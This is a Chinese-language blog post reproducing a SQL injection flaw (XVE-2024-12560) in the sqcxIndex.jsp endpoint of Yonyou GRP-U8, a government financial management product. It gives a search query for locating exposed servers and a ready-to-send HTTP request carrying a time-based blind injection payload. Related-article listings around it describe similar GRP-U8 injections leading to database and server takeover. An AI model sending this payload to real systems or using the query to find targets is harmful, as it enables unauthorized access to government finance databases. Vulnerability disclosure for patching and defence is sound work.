用友GRP-U8 sqcxIndex.jsp SQL注入漏洞(XVE-2024-12560)

最新推荐文章于 2024-07-21 10:14:45 发布
最新推荐文章于 2024-07-21 10:14:45 发布
阅读量302 收藏
点赞数 1
文章标签: 用友GRP-U8 sqcxIndex.jsp SQL注入漏洞 XVE-2024-12560
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/139260669
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

用友GRP-U8是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是行政事业财务领域最专业的政府财务管理软件。

资产搜索

app="用友-GRP-U8"

漏洞复现

GET /u8qx/sqcxIndex.jsp?key=1%27);+waitfor+delay+%270:0:5%27-- HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

cn_大腿
关注
用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)
0xSec
05-27 581
用友GRP-U8R10行政事业内控管理软件sqcxIndex.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现】用友 GRP-U8 bx_dj_check.jsp Sql注入漏洞
alert['Hello World']
09-14 391
用友 GRP-U8 bx_dj_check.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限
用友 GRP-U8 sqcxIndex SQL 注入漏洞
Keepb1ue的博客
03-25 425
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
漏洞复现」用友GRP-U8 sqcxIndex.jsp SQL注入漏洞(XVE-2024-12560)
qq_39894062的博客
05-27 612
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
用友GRP-U8 bx_dj_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10537)
0xSec
05-14 362
用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。
用友GRP-U8 dialog_moreUser_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10610)
0xSec
05-14 440
用友GRP-U8R10行政事业内控管理软件dialog_moreUser_check.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 obr_zdybxd_check.jsp SQL注入漏洞复现(XVE-2024-9322)
0xSec
01-18 468
用友GRP-U8R10行政事业内控管理软件obr_zdybxd_check.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 bx_dj_check.jsp SQL注入漏洞复现(XVE-2024-10537)
qq_39894062的博客
05-15 686
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
用友U8_bx_historyDataCheck.jsp SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
04-07 159
用友GRP-U8 bx_historyDataCheck.jsp存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。接收传参后并未进行任何过滤,从而导致sql注入没有人规定,一朵花,一定要成长为向日葵或者玫瑰。
用友GRP-U8 SelectDMJE.jsp SQL注入漏洞复现
0xSec
01-18 604
用友GRP-U8R10行政事业内控管理软件SelectDMJE.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现】用友 GRP-U8 bx_historyDataCheck.jsp Sql注入漏洞
alert['Hello World']
07-21 257
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。用友 GRP-U8 bx_historyDataCheck.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限
安全-密码相关技术学习路线导图
10-14
安全-密码相关技术学习路线导图
Selenium工具用于web应用程序的端到端自动化测试
10-14
内容概要:此文阐述了软件测试的重要性和多种类型的测试方式,并特别讲解如何利用 Selenium 这款 Web 应用测试工具实施自动化测试,从环境搭建,测试代码书写再到具体测试执行,涵盖了全面的操作演示。 适用人群:软件开发人员以及QA/QC人员。 使用场景及目标:对于进行web应用的自动化、端到端测试时可以借鉴本文提供的Selenium自动化流程,达到减少人工劳动、降低bug发生的目的。 阅读建议:本文介绍了理论与实战并重,推荐在读过概念部分后跟着实战操作一遍。
line_profiler-2.1.2-cp35-cp35m-win_amd64.whl
10-14
line_profiler-2.1.2-cp35-cp35m-win_amd64.whl
课程设计-1-最优配对.doc
10-14
课程设计-1-最优配对.doc
学生综合考评管理系统.zip
10-14
学生综合考评管理系统,主要的模块包括查看;管理员;个人中心、通知公告管理、班级管理、学生管理、教师管理,课程信息管理、作业布置管理、作业提交管理、留言信息管理、课程成绩管理,学生;个人中心、通知公告管理、教师管理、课程信息管理、作业布置管理、作业提交管理、留言信息管理、课程成绩管理,教师;个人中心、通知公告管理、学生管理、课程信息管理、作业布置管理、作业提交管理、留言信息管理、课程成绩管理等功能。系统中管理员主要是为了安全有效地存储和管理各类信息,还可以对系统进行管理与更新维护等操作,并且对后台有相应的操作权限。
基于Spring Boot的Java图书管理系统
最新发布
10-14
这是一个使用Spring Boot框架和相关技术创建简单图书管理系统的完整指导案例。介绍了项目的建立过程,详细涵盖了实体类定义、仓库层、业务层、控制器层的设计及配置步骤与方式,同时还介绍了如何运用Spring Initializr以及通过Postman等进行API测试的技术细节,并提供了启动项目和验证功能的具体途径,适用于初学者了解并掌握Java后端基本开发技能及其实战应用,特别是RESTful API的设计与实现。 适合人群:Java开发者,尤其是那些希望学习Spring Boot实践的初学者或是具有一定编程背景的研究员。 使用场景及目标:学习创建后端应用程序的方法,专注于理解和开发RESTful的服务,如增加、查看、修改及移除图书等功能;同时为想要提升自己对Java生态系统理解的人提供了一条清晰的发展路径。 该项目不仅可以帮助读者从头开始开发出自己的小项目,还是理解整个Spring生态中各个模块工作原理的好教材,并可以通过具体的操作步骤来熟悉软件开发生命周期的不同阶段与最佳实践。此外,它还可以作为教学演示、个人实践或者是搭建类似小型网站的模板,对于想要巩固自己编程能力和了解最新架构方式的Java开发爱好者是个不错的选择。
基于AT89C51单片机的全自动洗衣机模拟系统-12.zip
10-14
压缩包构造:程序,仿真,设计任务书,仿真演示视频,焊接注意事项,最小系统介绍,运行截图 仿真构造:AT89C51单片机, 具体实现功能: 模拟全自动洗衣机工作过程,以电机替代洗衣机电机。 可以显示洗衣机工作的状态(进水、浸泡、洗衣、脱水、结束)。显示工作剩余时间(洗衣程序可自定义,时间精度:秒)。 洗衣时交替正、反转。洗衣和脱水时电机转速不同。故障报警时声音提示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值